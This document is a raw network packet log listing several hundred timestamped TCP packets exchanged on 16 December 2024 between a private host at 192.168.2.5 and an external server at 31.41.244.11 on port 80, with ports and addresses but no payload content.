Dec 16, 2024 11:03:29.665074110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.665128946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.665174961 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.665226936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.666131973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.666232109 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.666276932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.666323900 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.667305946 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.667419910 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.667480946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.668286085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.668339968 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.668406010 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.668457031 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.669364929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.669420004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.669487953 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.669534922 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.670439005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.670576096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.670639992 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.671580076 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.671631098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.671699047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.671751022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.672651052 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.672739029 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.672784090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.672808886 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.673701048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.673758030 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.673810005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.673860073 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.674787998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.674840927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.674921036 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.674971104 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.675895929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.675944090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.676013947 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.676062107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.677122116 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.677175999 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.677175999 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.677227020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.678055048 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.678117990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.678332090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.678386927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.679115057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.679172993 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.679286003 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.679333925 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.680265903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.680352926 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.680391073 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.680640936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.681262970 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.681322098 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.816605091 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.816663980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.816730976 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.817081928 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.817138910 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.817209959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.817261934 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.818160057 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.818218946 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.818279982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.818331957 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.819241047 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.819293022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.819375992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.819432020 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.820343971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.820442915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.820498943 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.821419001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.821480036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.821506977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.821559906 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.822515011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.822571039 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.822611094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.822660923 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.823581934 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.823659897 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.823713064 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.824711084 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.824768066 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.824834108 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.824891090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.825771093 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.825823069 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.825987101 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.826039076 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.826869965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.826942921 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.827025890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.827073097 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.827941895 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.827996016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.828063011 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.828114033 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.829020977 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.829077959 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.829139948 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.829190016 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.830101013 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.830151081 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.830215931 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.830353022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.831218958 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.831353903 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.831408978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.832324028 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.832386017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.832487106 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.832539082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.833388090 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.833446980 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.833504915 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.833556890 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.834500074 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.834551096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.834645987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.834696054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.835633039 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.835725069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.835777998 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.836601019 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.836704016 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.836704969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.836751938 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.837711096 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.837764025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.837879896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.837925911 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.838757038 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.838869095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.838922024 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.839884043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.839936018 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.840038061 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.840090036 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.840917110 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.840965986 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.841048956 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.841101885 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.842022896 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.842077017 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.842142105 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.842206955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.843348980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.843404055 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.843462944 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.843518972 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.844189882 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.844239950 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.844335079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.844383955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.845288992 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.845340967 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.845406055 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.845458984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.846398115 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.846451044 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.846565008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.846617937 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.847434998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.847486973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.847564936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.847614050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.848527908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.848587990 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.848650932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.848699093 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.849611998 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.849664927 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.849689960 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.849741936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.850655079 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.850718021 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.850784063 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.850835085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.851764917 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.851818085 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.851882935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.851933002 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.853045940 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.853092909 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.853101015 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.853152037 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.854296923 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.854351997 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.854356050 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.854403973 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.855020046 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.855055094 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.855073929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.855098009 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.856070042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.856143951 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.856209993 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.856261969 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.857388973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.857461929 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.857531071 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.857582092 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.858282089 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.858442068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.858498096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.859643936 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.859694004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.859776020 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.859826088 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.860454082 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.860578060 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.860629082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.861521959 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.861586094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.861649990 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.861700058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.862601042 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.862648010 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.862730026 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.862782001 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.863709927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.863765955 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.863848925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.863917112 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.864912987 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.865042925 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.865098000 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.865839005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.865901947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.865958929 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.866008997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.866967916 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.867024899 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.867084980 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.867135048 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.868086100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.868136883 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.868141890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.868194103 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.869102001 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.869224072 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.869276047 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.870208979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.870265961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.870331049 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.870383978 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.871264935 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.871324062 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.871402979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.871457100 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.872370005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.872432947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.872447014 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.872514963 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:29.873513937 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:29.873846054 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.008641005 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.008728981 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.008729935 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.008814096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.009188890 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.009244919 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.009246111 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.009300947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.010281086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.010338068 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.010406971 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.010474920 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.011379957 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.011487007 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.011490107 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.011542082 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.012458086 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.012512922 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.012516975 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.012571096 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.013542891 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.013597012 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.013662100 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.013710022 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.014609098 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.014739037 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.014791965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.015686989 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.015753984 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.015818119 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.015870094 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.016799927 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.016915083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.016978025 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.017852068 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.017904043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.017970085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.018018961 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.018934965 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.019066095 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.019117117 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.020020008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.020075083 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.020128965 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.021152973 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.021205902 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.021259069 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.021310091 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.022207022 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.022258997 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.022324085 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.022376060 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.023294926 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.023354053 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.023403883 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.023451090 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.024374008 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.024435043 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.024492979 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.024705887 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.025466919 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.025583982 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.025635004 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.026535034 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.026634932 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.026685953 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.027601004 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.027699947 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.027705908 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.027753115 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.028698921 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.028744936 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.028810978 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.029607058 CET	49833	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:30.029772043 CET	80	49833	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:30.029820919 CET	49833	80	192.168.2.5	31.41.244.11
